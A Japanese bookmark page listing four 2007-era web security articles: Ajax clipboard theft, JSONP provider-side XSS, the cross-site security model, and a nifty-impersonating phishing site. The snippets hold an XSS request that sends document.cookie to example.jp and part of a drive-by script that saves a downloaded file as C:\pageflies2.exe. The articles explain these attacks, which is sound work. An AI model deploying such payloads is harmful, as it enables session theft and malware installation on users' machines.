タグ

関連タグで絞り込む (2)

タグの絞り込みを解除

securityとjavascriptに関するclonedのブックマーク (4)

  • Ajaxの危険な一面――クリップデータの盗難に悪用可能

    カット、コピー、ペーストは、デジタルライフに欠かせない基機能だ。開発者も一般ユーザーもこれらなしではやっていけない。一般ユーザーは日常的に、パスワードやクレジットカード番号などの情報をあるフォームから別のフォームにコピー&ペーストする。オフィスワーカーは、文書を作るときにこれらのコマンドをしょっちゅう使う。われわれがクリップボードのコピー&ペースト機能に依存していることは否定の余地がない。 レイ・オジー氏が「Wiring the Web」というブログエントリで述べているように、「クリップボードの最もシンプルな機能のおかげで、情報のコピーをあるアプリケーションから別のアプリケーションに移動する(つまり、値を渡す)という概念をユーザーが簡単に理解できるようになった」のだ。 ユーザーがカットやコピーの機能を使うと、その情報はコンピュータメモリ上のクリップボード領域に保存される。その情報は、後で

    Ajaxの危険な一面――クリップデータの盗難に悪用可能
  • Kazuho@Cybozu Labs: JSONP - データ提供者側のセキュリティについて

    « E4X-XSS 脆弱性について | メイン | 「スーパー技術者争奪戦」 » 2007年01月12日 JSONP - データ提供者側のセキュリティについて JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。 GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;

  • Kazuho@Cybozu Labs: クロスサイトのセキュリティモデル

    « Japanize - IE 系の User JavaScript エンジンに対応しました | メイン | 安全な JSON, 危険な JSON (Cross-site Including?) » 2007年01月04日 クロスサイトのセキュリティモデル あけましておめでとうございます。 昨年、社内で「XMLHttpRequest は何故クロスサイトで使えないのか。画像や SCRIPT タグは使えるのに」という疑問 (というより試問) を耳にしました。おもしろい話なのでブログネタにしようと思っていたのですが、新年早々 GMAIL の事例がスラッシュドットされていたので、自分の現時点での理解をまとめてみることにしました。文書を確認して書いているわけではないので、間違いがあれば指摘してください。また、よい参考文献をご存知の方がいらっしゃいましたら、教えていただければ幸いです。 ウェブブラウザ

  • 「www.homepage3-nifty.com」という、niftyに偽装したサイトが登場 | hylomの日記 | スラド

    タイトル通り。 「www.homepage3-nifty.com」と、URLだけみるとぱっと見nifty内にあるサイトっぽいけど、実はよく見ると分かるとおりnifty内ではなく、中国のサイトにつながるようで。 で、このサイト上にあるページには幅0、高さ0のインラインフレームに以下のようなスクリプトを仕込んだページを表示させる、と。 よく考えるよなぁ。確かにこのURLだとダマされる人が出てくるかも。 function do1(mx,as,p) { mx.Send(); as.Type = 1; as.Open(); as.Write(mx.responseBody); as.SaveToFile(p,2); as.Close(); } var a = null; var mx,as,p; p = "C:\\pageflies2.exe" a = (document.createElement

    cloned
    cloned 2007/01/03
    実際のスクリプト
  • 1